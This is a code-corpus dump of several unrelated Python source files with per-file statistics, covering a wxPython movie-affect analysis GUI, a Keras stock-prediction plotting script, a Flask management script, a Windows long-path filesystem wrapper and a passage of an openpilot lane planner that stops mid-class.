sampleFrame.Show()
self.Layout()
def onCaptureTestButton(self, event):
self.print("Camera Capture event started.")
captureFrame = CameraCaptureFrame()
captureFrame.Show()
self.Layout()
def onAnalyseMenu(self, event):
with wx.FileDialog(self, "Open a sample file", wildcard="avi files (*.avi)|*.avi",
style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
self.print("File %s found!"% (pathname))
_sid = pathname[:pathname.rindex("/")]
_sid = _sid[_sid.rindex("/")+1:]
analyseTab = AnalyseMovieTabPanel(self.panel_notebook, self, _sid)
self.panel_notebook.AddPage(analyseTab, "Analyse Sample")
self.Layout()
def onAnalyse(self, event, sid, form):
#import sys, time, threading
from multiprocessing import Process
fer = form.chkFER.GetValue()
head = form.chkBEGR.GetValue()
body = False
preview = form.chkPreview.GetValue()
video_file_name = "./data/"+sid+ "/test.avi"
video_dir = "./data/"+sid+"/"
if not preview:
p = Process(name='process',
target=analyse_func,
args=(video_dir, video_file_name,
fer,head,body,preview,self.print,) )
p.start()
else:
analyse_func(video_dir, video_file_name,
fer,head,body,preview,self.print)
self.analyse_process = p
def onStopProcess(self, event):
if self.analyse_process is not None:
self.analyse_process.terminate()
def delPage(self, pageTitle):
for index in range(self.panel_notebook.GetPageCount()):
if self.panel_notebook.GetPageText(index) == pageTitle:
self.panel_notebook.DeletePage(index)
self.panel_notebook.SendSizeEvent()
break
| 34.896154
| 92
| 0.616114
|
import wx
from src.playback import RecordSystem, VLCPlayer
from src.utils import SampleLoader, SampleController, MovieController, PersonController
from src.wx.record import RecordTabPanel, CameraCaptureFrame
from src.wx.analyse_movie import AnalyseMovieTabPanel
from src.wx.samples import SampleTabPanel, SampleTabFrame
from src.wx.movies import MoviesPanel
from src.wx.person import PersonPanel
from src.gsr import GSRSensor
def analyse_func(video_dir, video_file_name, fer,head,body,preview,_print):
if fer:
_print("Analysing facial keypoints...")
from FER.ferAnalysis import FaceSystem
system = FaceSystem()
system.analyse(video_file_name, preview)
if head:
from src.headpose import HeadPoseEstimator
sys = HeadPoseEstimator()
_print("Analysing body keypoints...")
loader = SampleLoader(video_dir)
sys.analyse(loader.getVideoFile(), loader.getDir()+"head_points.npy", preview)
if body:
_print("Initializing pose system")
from src.openpose import PoseSystem
sys = PoseSystem()
_print("Analysing body keypoints ")
loader = SampleLoader(kwargs["filename"])
sys.analyse(loader.getVideoFile(), loader.getDir()+"body_points.npy", preview)
class CPanelEventHandlers:
recordTab = None
moviesTab = None
personTab = None
analyse_process=None
def onQuit(self, event):
self.Close(True)
def onAbout(self, event):
msg = "Created by Ibrahim & Faith for FYP\n\t HELP School of ICT \n\t 2019"
dlg = wx.MessageDialog(self, msg, "Affective Movie Evaluator", wx.OK)
dlg.ShowModal()
dlg.Destroy()
def newRecord(self, event):
self.print("Creating a new record")
def onNewSample(self, event):
class EmptyClass: pass
controllers = EmptyClass()
controllers.personController = PersonController()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
controllers.recordSystem = RecordSystem()
controllers.mediaplayer = VLCPlayer
recordTab = RecordTabPanel(self.panel_notebook, self, controllers)
idx = self.panel_notebook.AddPage(recordTab, "Record Screening")
self.Layout()
def onMovieAnalyse(self, event):
class EmptyClass: pass
controllers = EmptyClass()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
controllers.mediaplayer = VLCPlayer
controllers.sampleController.read_dirs()
screeningTab = AnalyseMovieTabPanel(self.panel_notebook, self, controllers)
idx = self.panel_notebook.AddPage(screeningTab, "Screening Tab")
self.Layout()
def onNewScreening(self, event):
pass
def onNew(self, event):
with wx.FileDialog(self, "Open a movie file", wildcard="mp4 files (*.mp5)|*.mp4",
style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
self.print("File %s found!"% (pathname))
sys = RecordSystem()
msys = MovieController()
msys.read_files()
mdata = msys.getMovieByFile(pathname)
recordTab = RecordTabPanel(self.panel_notebook, self)
idx = self.panel_notebook.AddPage(recordTab, "Record Screening")
recordTab.form.txtMovieFile.SetValue(pathname)
inp_map = {
"name": recordTab.form.txtMovieName,
"year": recordTab.form.txtYear,
"genre": recordTab.form.txtGenre,
"tags": recordTab.form.txtTag
}
self.recordTab = recordTab
for k in inp_map:
try:
inpField = inp_map[k]
inpField.SetValue(mdata[k])
except KeyError:
continue
self.Layout()
def onMoviesTab(self, event):
if self.moviesTab is None:
tab_title = "Movies Panel"
movieController = MovieController()
moviesTab = MoviesPanel(self.panel_notebook, self, tab_title, movieController)
idx = self.panel_notebook.AddPage(moviesTab, tab_title)
self.moviesTab = moviesTab
else:
self.moviesTab.onCloseTab(event)
def onPersonTab(self, event):
if self.personTab is None:
tab_title = "Person Panel"
person_controller = PersonController()
personTab = PersonPanel(self.panel_notebook, self, tab_title, person_controller)
idx = self.panel_notebook.AddPage(personTab, tab_title)
self.personTab = personTab
else:
self.personTab.onCloseTab(event)
def onCloseTab(self, event):
self.delPage("Record Screening")
self.Layout()
def onCloseAnalyserTab(self, event):
self.onStopProcess(event)
self.delPage("Analyse Sample")
self.Layout()
def onRecord(self, event, form):
sys = RecordSystem()
msys = MovieController()
msys.read_files()
person = form.txtPerson.GetValue()
movie_path = form.txtMovieFile.GetValue()
mdata = msys.getMovieByFile(movie_path)
file_name = msys.get_dir() + msys.getMovieObjById(mdata['id']).filename
data = {"movie_id": "%s"%(mdata["id"]),"subject_name": person}
player = VLCPlayer(file_name)
sys = RecordSystem()
filename = sys.createSampleDir()
sys.saveMetaData(filename, data)
sys.start_recording("sample", player, False, filename)
self.print("Record complete...")
self.print("New sample created. sample_id= %s"%(filename))
def onSampleMenu(self, event):
if self.recordTab is not None:
self.recordTab.Close()
class EmptyClass: pass
controllers = EmptyClass()
controllers.personController = PersonController()
controllers.movieController = MovieController()
controllers.sampleController = SampleController()
sampleFrame = SampleTabFrame(controllers)
sampleFrame.Show()
self.Layout()
def onCaptureTestButton(self, event):
self.print("Camera Capture event started.")
captureFrame = CameraCaptureFrame()
captureFrame.Show()
self.Layout()
def onAnalyseMenu(self, event):
with wx.FileDialog(self, "Open a sample file", wildcard="avi files (*.avi)|*.avi",
style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
self.print("File %s found!"% (pathname))
_sid = pathname[:pathname.rindex("/")]
_sid = _sid[_sid.rindex("/")+1:]
analyseTab = AnalyseMovieTabPanel(self.panel_notebook, self, _sid)
self.panel_notebook.AddPage(analyseTab, "Analyse Sample")
self.Layout()
def onAnalyse(self, event, sid, form):
from multiprocessing import Process
fer = form.chkFER.GetValue()
head = form.chkBEGR.GetValue()
body = False
preview = form.chkPreview.GetValue()
video_file_name = "./data/"+sid+ "/test.avi"
video_dir = "./data/"+sid+"/"
if not preview:
p = Process(name='process',
target=analyse_func,
args=(video_dir, video_file_name,
fer,head,body,preview,self.print,) )
p.start()
else:
analyse_func(video_dir, video_file_name,
fer,head,body,preview,self.print)
self.analyse_process = p
def onStopProcess(self, event):
if self.analyse_process is not None:
self.analyse_process.terminate()
def delPage(self, pageTitle):
for index in range(self.panel_notebook.GetPageCount()):
if self.panel_notebook.GetPageText(index) == pageTitle:
self.panel_notebook.DeletePage(index)
self.panel_notebook.SendSizeEvent()
break
| true
| true
|
1c422e8a6aafaa91932fb0b8728d242ea83b1153
| 3,879
|
py
|
Python
|
Processing/play_model.py
|
AndrewJBean/Stocks
|
1a082856983936e77c45d5b47274ac5f2a344348
|
[
"MIT"
] | 1
|
2019-06-13T03:13:55.000Z
|
2019-06-13T03:13:55.000Z
|
Processing/play_model.py
|
AndrewJBean/Stocks
|
1a082856983936e77c45d5b47274ac5f2a344348
|
[
"MIT"
] | null | null | null |
Processing/play_model.py
|
AndrewJBean/Stocks
|
1a082856983936e77c45d5b47274ac5f2a344348
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# MIT License
# Copyright (c) 2018 Andrew J. Bean
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import h5py
import numpy as np
import matplotlib.pyplot as plt
from keras.models import load_model
def main():
Gain = '0.5'
Loss = '0.5'
MSE_Loss = False
LinearActivation = False
DropFrac = '0.0'
NEpochs = '200'
NameRoot = 'my_model_'
whichplot = 1
extension = Gain+','+Loss +'_open'
ExamplesFile = h5py.File("2min_examples_"+extension+".hdf5", "r")
# ExamplesFile = h5py.File("2min_aggregated_examples_"+extension+".hdf5", "r")
SaveName = NameRoot+extension
if MSE_Loss:
SaveName = SaveName + '_MSE'
if LinearActivation:
SaveName = SaveName + '_Lin'
if DropFrac!='0.7':
SaveName = SaveName + '_' + DropFrac
# SaveName = 'Trained/' + SaveName + "_"+NEpochs+"_"+val_loss+".h5"
SaveName = 'Trained/' + SaveName + "_"+NEpochs+".h5"
print(SaveName)
model = load_model(SaveName)
print(extension)
if MSE_Loss:
print('using mean_squared_error loss')
else:
print('using binary_crossentropy loss')
print(ExamplesFile['Features'].shape)
print(ExamplesFile['Outcomes'].shape)
print(ExamplesFile['Timestamps'].shape)
NumExamples = ExamplesFile['Features'].shape[0]
FeatureSize = ExamplesFile['Features'].shape[1]
SampleShift = 0.0
StartTest = int((0.9 - SampleShift )*NumExamples)
EndTest = int((1.0 - SampleShift )*NumExamples)
print('reading data from HDF5...')
# x_train = ExamplesFile['Features'][:StartTest]
# y_train = ExamplesFile['Outcomes'][:StartTest]
x_test = ExamplesFile['Features'][StartTest:EndTest]
y_test = ExamplesFile['Outcomes'][StartTest:EndTest]
t_test = ExamplesFile['Timestamps'][StartTest:EndTest]
y_predict = model.predict_on_batch(x_test)
y_predict = np.array([y_predict[i][0] for i in range(len(y_predict))])
Rearrange = y_predict.argsort()
# flip so losses are at right of plot
# don't flip to keep losses at the left
# Rearrange = np.flip(Rearrange,0)
y_predict = y_predict[Rearrange]
y_test = y_test[Rearrange]
t_test = t_test[Rearrange]
y_test = y_test*(float(Gain)+float(Loss))/100.0 - float(Loss)/100.0 + 1.0
if whichplot==0:
y_test = np.log(y_test)
y_test = np.cumsum(y_test)
for i in range(len(y_test)):
y_test[i] = y_test[i]/(i+1.0)
plt.plot(np.exp(y_test)*100-100)
plt.plot((t_test-min(t_test))/(max(t_test)-min(t_test)),'.')
plt.show()
elif whichplot==1:
NWindow = 100
plt.plot((t_test-min(t_test))/(max(t_test)-min(t_test)),'.')
plt.plot(np.convolve(y_test*100-100,np.ones(NWindow)/NWindow,mode='same'))
plt.plot(y_predict)
plt.show()
if __name__ == '__main__':
main()
| 34.327434
| 82
| 0.67801
|
import h5py
import numpy as np
import matplotlib.pyplot as plt
from keras.models import load_model
def main():
Gain = '0.5'
Loss = '0.5'
MSE_Loss = False
LinearActivation = False
DropFrac = '0.0'
NEpochs = '200'
NameRoot = 'my_model_'
whichplot = 1
extension = Gain+','+Loss +'_open'
ExamplesFile = h5py.File("2min_examples_"+extension+".hdf5", "r")
SaveName = NameRoot+extension
if MSE_Loss:
SaveName = SaveName + '_MSE'
if LinearActivation:
SaveName = SaveName + '_Lin'
if DropFrac!='0.7':
SaveName = SaveName + '_' + DropFrac
SaveName = 'Trained/' + SaveName + "_"+NEpochs+".h5"
print(SaveName)
model = load_model(SaveName)
print(extension)
if MSE_Loss:
print('using mean_squared_error loss')
else:
print('using binary_crossentropy loss')
print(ExamplesFile['Features'].shape)
print(ExamplesFile['Outcomes'].shape)
print(ExamplesFile['Timestamps'].shape)
NumExamples = ExamplesFile['Features'].shape[0]
FeatureSize = ExamplesFile['Features'].shape[1]
SampleShift = 0.0
StartTest = int((0.9 - SampleShift )*NumExamples)
EndTest = int((1.0 - SampleShift )*NumExamples)
print('reading data from HDF5...')
x_test = ExamplesFile['Features'][StartTest:EndTest]
y_test = ExamplesFile['Outcomes'][StartTest:EndTest]
t_test = ExamplesFile['Timestamps'][StartTest:EndTest]
y_predict = model.predict_on_batch(x_test)
y_predict = np.array([y_predict[i][0] for i in range(len(y_predict))])
Rearrange = y_predict.argsort()
# Rearrange = np.flip(Rearrange,0)
y_predict = y_predict[Rearrange]
y_test = y_test[Rearrange]
t_test = t_test[Rearrange]
y_test = y_test*(float(Gain)+float(Loss))/100.0 - float(Loss)/100.0 + 1.0
if whichplot==0:
y_test = np.log(y_test)
y_test = np.cumsum(y_test)
for i in range(len(y_test)):
y_test[i] = y_test[i]/(i+1.0)
plt.plot(np.exp(y_test)*100-100)
plt.plot((t_test-min(t_test))/(max(t_test)-min(t_test)),'.')
plt.show()
elif whichplot==1:
NWindow = 100
plt.plot((t_test-min(t_test))/(max(t_test)-min(t_test)),'.')
plt.plot(np.convolve(y_test*100-100,np.ones(NWindow)/NWindow,mode='same'))
plt.plot(y_predict)
plt.show()
if __name__ == '__main__':
main()
| true
| true
|
1c422ef9036dbb792a8e97dffa85983051952d08
| 1,251
|
py
|
Python
|
manage.py
|
cristobal23/strabo
|
ab9aa1d4fde9ae9c1c225e689898cb30ff7f86c6
|
[
"Apache-2.0"
] | null | null | null |
manage.py
|
cristobal23/strabo
|
ab9aa1d4fde9ae9c1c225e689898cb30ff7f86c6
|
[
"Apache-2.0"
] | 3
|
2018-07-27T01:49:13.000Z
|
2018-08-20T01:57:06.000Z
|
manage.py
|
cristobal23/strabo
|
ab9aa1d4fde9ae9c1c225e689898cb30ff7f86c6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import os
from flask_script import Manager, Shell, Server
from flask_script.commands import ShowUrls, Clean
from strabo.app import create_app
from strabo.models import db, User
# default to dev config
env = os.environ.get('STRABO_ENV', 'dev')
app = create_app('strabo.settings.%sConfig' % env.capitalize())
HERE = os.path.abspath(os.path.dirname(__file__))
TEST_PATH = os.path.join(HERE, 'tests')
manager = Manager(app)
def _make_context():
"""Return context dict for a shell session so you can access
app, db, and the User model by default.
"""
return {'app': app, 'db': db, 'User': User}
@manager.command
def test():
"""Run the tests."""
import pytest
exit_code = pytest.main([TEST_PATH, '--verbose'])
return exit_code
@manager.command
def createdb():
""" Creates a database with all of the tables defined in
your SQLAlchemy models
"""
db.create_all()
manager.add_command("server", Server())
manager.add_command("urls", ShowUrls())
manager.add_command("clean", Clean())
# Creates a python REPL with several default imports in the context of the app
manager.add_command('shell', Shell(make_context=_make_context))
if __name__ == "__main__":
manager.run()
| 24.529412
| 78
| 0.704237
|
import os
from flask_script import Manager, Shell, Server
from flask_script.commands import ShowUrls, Clean
from strabo.app import create_app
from strabo.models import db, User
env = os.environ.get('STRABO_ENV', 'dev')
app = create_app('strabo.settings.%sConfig' % env.capitalize())
HERE = os.path.abspath(os.path.dirname(__file__))
TEST_PATH = os.path.join(HERE, 'tests')
manager = Manager(app)
def _make_context():
return {'app': app, 'db': db, 'User': User}
@manager.command
def test():
import pytest
exit_code = pytest.main([TEST_PATH, '--verbose'])
return exit_code
@manager.command
def createdb():
db.create_all()
manager.add_command("server", Server())
manager.add_command("urls", ShowUrls())
manager.add_command("clean", Clean())
manager.add_command('shell', Shell(make_context=_make_context))
if __name__ == "__main__":
manager.run()
| true
| true
|
1c422fb7fbcdd11294596298fce6ebce66e1b612
| 4,639
|
py
|
Python
|
utils/fs.py
|
pombredanne/swarming.client
|
45f9d61c66e18bf3bddc2022cba615abbeb826ce
|
[
"Apache-2.0"
] | null | null | null |
utils/fs.py
|
pombredanne/swarming.client
|
45f9d61c66e18bf3bddc2022cba615abbeb826ce
|
[
"Apache-2.0"
] | null | null | null |
utils/fs.py
|
pombredanne/swarming.client
|
45f9d61c66e18bf3bddc2022cba615abbeb826ce
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Wraps os, os.path and shutil functions to work around MAX_PATH on Windows."""
import __builtin__
import inspect
import os
import shutil
import sys
if sys.platform == 'win32':
import ctypes
GetFileAttributesW = ctypes.windll.kernel32.GetFileAttributesW
GetFileAttributesW.argtypes = (ctypes.c_wchar_p,)
GetFileAttributesW.restype = ctypes.c_uint
CreateSymbolicLinkW = ctypes.windll.kernel32.CreateSymbolicLinkW
CreateSymbolicLinkW.argtypes = (
ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
CreateSymbolicLinkW.restype = ctypes.c_ubyte
def extend(path):
"""Adds '\\\\?\\' when given an absolute path so the MAX_PATH (260) limit is
not enforced.
"""
assert os.path.isabs(path), path
assert isinstance(path, unicode), path
prefix = u'\\\\?\\'
return path if path.startswith(prefix) else prefix + path
def trim(path):
"""Removes '\\\\?\\' when receiving a path."""
assert isinstance(path, unicode), path
prefix = u'\\\\?\\'
if path.startswith(prefix):
path = path[len(prefix):]
assert os.path.isabs(path), path
return path
def islink(path):
"""Proper implementation of islink() for Windows.
The stdlib is broken.
https://msdn.microsoft.com/library/windows/desktop/aa365682.aspx
"""
FILE_ATTRIBUTE_REPARSE_POINT = 1024
return bool(GetFileAttributesW(extend(path)) & FILE_ATTRIBUTE_REPARSE_POINT)
def symlink(source, link_name):
"""Creates a symlink on Windows 7 and later.
This function will only work once SeCreateSymbolicLinkPrivilege has been
enabled. See file_path.enable_symlink().
Useful material:
CreateSymbolicLinkW:
https://msdn.microsoft.com/library/windows/desktop/aa363866.aspx
UAC and privilege stripping:
https://msdn.microsoft.com/library/bb530410.aspx
Privilege constants:
https://msdn.microsoft.com/library/windows/desktop/bb530716.aspx
"""
# TODO(maruel): This forces always creating absolute path symlinks.
source = extend(source)
flags = 1 if os.path.isdir(source) else 0
if not CreateSymbolicLinkW(extend(link_name), source, flags):
raise WindowsError() # pylint: disable=undefined-variable
def walk(top, *args, **kwargs):
return os.walk(extend(top), *args, **kwargs)
else:
def extend(path):
"""Convert the path back to utf-8.
In some rare case, concatenating str and unicode may cause a
UnicodeEncodeError because the default encoding is 'ascii'.
"""
assert os.path.isabs(path), path
assert isinstance(path, unicode), path
return path.encode('utf-8')
def trim(path):
"""Path mangling is not needed on POSIX."""
assert os.path.isabs(path), path
assert isinstance(path, str), path
return path.decode('utf-8')
def islink(path):
return os.path.islink(extend(path))
def symlink(source, link_name):
return os.symlink(source, extend(link_name))
def walk(top, *args, **kwargs):
for root, dirs, files in os.walk(extend(top), *args, **kwargs):
yield trim(root), dirs, files
## builtin
def open(path, *args, **kwargs): # pylint: disable=redefined-builtin
return __builtin__.open(extend(path), *args, **kwargs)
## os
def link(source, link_name):
return os.link(extend(source), extend(link_name))
def rename(old, new):
return os.rename(extend(old), extend(new))
def renames(old, new):
return os.renames(extend(old), extend(new))
## shutil
def copy2(src, dst):
return shutil.copy2(extend(src), extend(dst))
def rmtree(path, *args, **kwargs):
return shutil.rmtree(extend(path), *args, **kwargs)
## The rest
def _get_lambda(func):
return lambda path, *args, **kwargs: func(extend(path), *args, **kwargs)
def _is_path_fn(func):
return (inspect.getargspec(func)[0] or [None]) == 'path'
_os_fns = (
'access', 'chdir', 'chflags', 'chroot', 'chmod', 'chown', 'lchflags',
'lchmod', 'lchown', 'listdir', 'lstat', 'mknod', 'mkdir', 'makedirs',
'remove', 'removedirs', 'rmdir', 'stat', 'statvfs', 'unlink', 'utime')
_os_path_fns = (
'exists', 'lexists', 'getatime', 'getmtime', 'getctime', 'getsize', 'isfile',
'isdir', 'ismount')
for _fn in _os_fns:
if hasattr(os, _fn):
sys.modules[__name__].__dict__.setdefault(
_fn, _get_lambda(getattr(os, _fn)))
for _fn in _os_path_fns:
if hasattr(os.path, _fn):
sys.modules[__name__].__dict__.setdefault(
_fn, _get_lambda(getattr(os.path, _fn)))
| 25.772222
| 80
| 0.686786
|
import __builtin__
import inspect
import os
import shutil
import sys
if sys.platform == 'win32':
import ctypes
GetFileAttributesW = ctypes.windll.kernel32.GetFileAttributesW
GetFileAttributesW.argtypes = (ctypes.c_wchar_p,)
GetFileAttributesW.restype = ctypes.c_uint
CreateSymbolicLinkW = ctypes.windll.kernel32.CreateSymbolicLinkW
CreateSymbolicLinkW.argtypes = (
ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
CreateSymbolicLinkW.restype = ctypes.c_ubyte
def extend(path):
assert os.path.isabs(path), path
assert isinstance(path, unicode), path
prefix = u'\\\\?\\'
return path if path.startswith(prefix) else prefix + path
def trim(path):
assert isinstance(path, unicode), path
prefix = u'\\\\?\\'
if path.startswith(prefix):
path = path[len(prefix):]
assert os.path.isabs(path), path
return path
def islink(path):
FILE_ATTRIBUTE_REPARSE_POINT = 1024
return bool(GetFileAttributesW(extend(path)) & FILE_ATTRIBUTE_REPARSE_POINT)
def symlink(source, link_name):
source = extend(source)
flags = 1 if os.path.isdir(source) else 0
if not CreateSymbolicLinkW(extend(link_name), source, flags):
raise WindowsError()
def walk(top, *args, **kwargs):
return os.walk(extend(top), *args, **kwargs)
else:
def extend(path):
"""Convert the path back to utf-8.
In some rare case, concatenating str and unicode may cause a
UnicodeEncodeError because the default encoding is 'ascii'.
"""
assert os.path.isabs(path), path
assert isinstance(path, unicode), path
return path.encode('utf-8')
def trim(path):
"""Path mangling is not needed on POSIX."""
assert os.path.isabs(path), path
assert isinstance(path, str), path
return path.decode('utf-8')
def islink(path):
return os.path.islink(extend(path))
def symlink(source, link_name):
return os.symlink(source, extend(link_name))
def walk(top, *args, **kwargs):
for root, dirs, files in os.walk(extend(top), *args, **kwargs):
yield trim(root), dirs, files
en(path, *args, **kwargs):
return __builtin__.open(extend(path), *args, **kwargs)
ef link(source, link_name):
return os.link(extend(source), extend(link_name))
def rename(old, new):
return os.rename(extend(old), extend(new))
def renames(old, new):
return os.renames(extend(old), extend(new))
opy2(src, dst):
return shutil.copy2(extend(src), extend(dst))
def rmtree(path, *args, **kwargs):
return shutil.rmtree(extend(path), *args, **kwargs)
t_lambda(func):
return lambda path, *args, **kwargs: func(extend(path), *args, **kwargs)
def _is_path_fn(func):
return (inspect.getargspec(func)[0] or [None]) == 'path'
_os_fns = (
'access', 'chdir', 'chflags', 'chroot', 'chmod', 'chown', 'lchflags',
'lchmod', 'lchown', 'listdir', 'lstat', 'mknod', 'mkdir', 'makedirs',
'remove', 'removedirs', 'rmdir', 'stat', 'statvfs', 'unlink', 'utime')
_os_path_fns = (
'exists', 'lexists', 'getatime', 'getmtime', 'getctime', 'getsize', 'isfile',
'isdir', 'ismount')
for _fn in _os_fns:
if hasattr(os, _fn):
sys.modules[__name__].__dict__.setdefault(
_fn, _get_lambda(getattr(os, _fn)))
for _fn in _os_path_fns:
if hasattr(os.path, _fn):
sys.modules[__name__].__dict__.setdefault(
_fn, _get_lambda(getattr(os.path, _fn)))
| true
| true
|
1c4231dd19d810e39685a4bcc81a1b4b6addc51b
| 4,994
|
py
|
Python
|
selfdrive/controls/lib/lane_planner.py
|
YHKIM71/openpilot0813Volt
|
9f8b401d2b544d54e3b5e8c019f6ca20926a61f0
|
[
"MIT"
] | null | null | null |
selfdrive/controls/lib/lane_planner.py
|
YHKIM71/openpilot0813Volt
|
9f8b401d2b544d54e3b5e8c019f6ca20926a61f0
|
[
"MIT"
] | null | null | null |
selfdrive/controls/lib/lane_planner.py
|
YHKIM71/openpilot0813Volt
|
9f8b401d2b544d54e3b5e8c019f6ca20926a61f0
|
[
"MIT"
] | null | null | null |
import numpy as np
from cereal import log
from common.filter_simple import FirstOrderFilter
from common.numpy_fast import interp, clip, mean
from common.realtime import DT_MDL
from selfdrive.hardware import EON, TICI
from selfdrive.swaglog import cloudlog
from selfdrive.ntune import ntune_common_get
ENABLE_ZORROBYTE = True
ENABLE_INC_LANE_PROB = True
TRAJECTORY_SIZE = 33
# camera offset is meters from center car to camera
if EON:
CAMERA_OFFSET = ntune_common_get("cameraOffset")
PATH_OFFSET = 0.0
elif TICI:
CAMERA_OFFSET = -0.04
PATH_OFFSET = -0.04
else:
CAMERA_OFFSET = 0.0
PATH_OFFSET = 0.0
class LanePlanner:
def __init__(self, wide_camera=False):
self.ll_t = np.zeros((TRAJECTORY_SIZE,))
self.ll_x = np.zeros((TRAJECTORY_SIZE,))
self.lll_y = np.zeros((TRAJECTORY_SIZE,))
self.rll_y = np.zeros((TRAJECTORY_SIZE,))
self.lane_width_estimate = FirstOrderFilter(3.7, 9.95, DT_MDL)
self.lane_width_certainty = FirstOrderFilter(1.0, 0.95, DT_MDL)
self.lane_width = 3.7
self.lll_prob = 0.
self.rll_prob = 0.
self.d_prob = 0.
self.lll_std = 0.
self.rll_std = 0.
self.l_lane_change_prob = 0.
self.r_lane_change_prob = 0.
self.camera_offset = -CAMERA_OFFSET if wide_camera else CAMERA_OFFSET
self.path_offset = -PATH_OFFSET if wide_camera else PATH_OFFSET
self.readings = []
self.frame = 0
self.wide_camera = wide_camera
def parse_model(self, md):
lane_lines = md.laneLines
if len(lane_lines) == 4 and len(lane_lines[0].t) == TRAJECTORY_SIZE:
self.ll_t = (np.array(lane_lines[1].t) + np.array(lane_lines[2].t))/2
# left and right ll x is the same
self.ll_x = lane_lines[1].x
# only offset left and right lane lines; offsetting path does not make sense
cameraOffset = ntune_common_get("cameraOffset") + 0.08 if self.wide_camera else ntune_common_get("cameraOffset")
self.lll_y = np.array(lane_lines[1].y) - cameraOffset
self.rll_y = np.array(lane_lines[2].y) - cameraOffset
self.lll_prob = md.laneLineProbs[1]
self.rll_prob = md.laneLineProbs[2]
self.lll_std = md.laneLineStds[1]
self.rll_std = md.laneLineStds[2]
desire_state = md.meta.desireState
if len(desire_state):
self.l_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeLeft]
self.r_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeRight]
def get_d_path(self, v_ego, path_t, path_xyz):
# Reduce reliance on lanelines that are too far apart or
# will be in a few seconds
path_xyz[:, 1] -= self.path_offset
l_prob, r_prob = self.lll_prob, self.rll_prob
width_pts = self.rll_y - self.lll_y
prob_mods = []
for t_check in [0.0, 1.5, 3.0]:
width_at_t = interp(t_check * (v_ego + 7), self.ll_x, width_pts)
prob_mods.append(interp(width_at_t, [4.0, 5.0], [1.0, 0.0]))
mod = min(prob_mods)
l_prob *= mod
r_prob *= mod
# Reduce reliance on uncertain lanelines
l_std_mod = interp(self.lll_std, [.15, .3], [1.0, 0.0])
r_std_mod = interp(self.rll_std, [.15, .3], [1.0, 0.0])
l_prob *= l_std_mod
r_prob *= r_std_mod
if ENABLE_ZORROBYTE:
# zorrobyte code
if l_prob > 0.5 and r_prob > 0.5:
self.frame += 1
if self.frame > 20:
self.frame = 0
current_lane_width = clip(abs(self.rll_y[0] - self.lll_y[0]), 2.5, 3.5)
self.readings.append(current_lane_width)
self.lane_width = mean(self.readings)
if len(self.readings) >= 30:
self.readings.pop(0)
# zorrobyte
# Don't exit dive
if abs(self.rll_y[0] - self.lll_y[0]) > self.lane_width:
r_prob = r_prob / interp(l_prob, [0, 1], [1, 3])
else:
# Find current lanewidth
self.lane_width_certainty.update(l_prob * r_prob)
current_lane_width = abs(self.rll_y[0] - self.lll_y[0])
self.lane_width_estimate.update(current_lane_width)
speed_lane_width = interp(v_ego, [0., 31.], [2.8, 3.5])
self.lane_width = self.lane_width_certainty.x * self.lane_width_estimate.x + \
(1 - self.lane_width_certainty.x) * speed_lane_width
clipped_lane_width = min(4.0, self.lane_width)
path_from_left_lane = self.lll_y + clipped_lane_width / 2.0
path_from_right_lane = self.rll_y - clipped_lane_width / 2.0
self.d_prob = l_prob + r_prob - l_prob * r_prob
# neokii
if ENABLE_INC_LANE_PROB and self.d_prob > 0.65:
self.d_prob = min(self.d_prob * 1.3, 1.0)
lane_path_y = (l_prob * path_from_left_lane + r_prob * path_from_right_lane) / (l_prob + r_prob + 0.0001)
safe_idxs = np.isfinite(self.ll_t)
if safe_idxs[0]:
lane_path_y_interp = np.interp(path_t, self.ll_t[safe_idxs], lane_path_y[safe_idxs])
path_xyz[:,1] = self.d_prob * lane_path_y_interp + (1.0 - self.d_prob) * path_xyz[:,1]
else:
cloudlog.warning("Lateral mpc - NaNs in laneline times, ignoring")
return path_xyz
| 35.671429
| 118
| 0.676812
|
import numpy as np
from cereal import log
from common.filter_simple import FirstOrderFilter
from common.numpy_fast import interp, clip, mean
from common.realtime import DT_MDL
from selfdrive.hardware import EON, TICI
from selfdrive.swaglog import cloudlog
from selfdrive.ntune import ntune_common_get
ENABLE_ZORROBYTE = True
ENABLE_INC_LANE_PROB = True
TRAJECTORY_SIZE = 33
if EON:
CAMERA_OFFSET = ntune_common_get("cameraOffset")
PATH_OFFSET = 0.0
elif TICI:
CAMERA_OFFSET = -0.04
PATH_OFFSET = -0.04
else:
CAMERA_OFFSET = 0.0
PATH_OFFSET = 0.0
class LanePlanner:
def __init__(self, wide_camera=False):
